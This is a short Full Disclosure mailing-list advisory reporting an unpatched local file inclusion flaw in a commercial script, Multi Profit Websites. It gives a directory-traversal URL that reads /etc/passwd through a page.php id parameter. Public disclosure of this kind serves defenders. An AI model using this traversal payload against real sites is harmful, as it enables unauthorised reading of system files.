Full Disclosure mailing list archives

LFI In Multi Profit Websites


From: rockey killer <skg102 () gmail com>
Date: Fri, 9 Apr 2010 19:51:26 +0530

Local File Inclusion (LFI) in Multi Profit Websites


Multi Profit Websites is a commercial script that is running on multiple
domains and they claims that this script earns money for the owner.

Vulnerability

Local File Inclusion Via URL which can be reproduced by

domain/page.php?id=../../../../../../etc/passwd


Reported : 1st april 2009
Fixed : ----------------------

Credits,
H4CK3R Crew
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: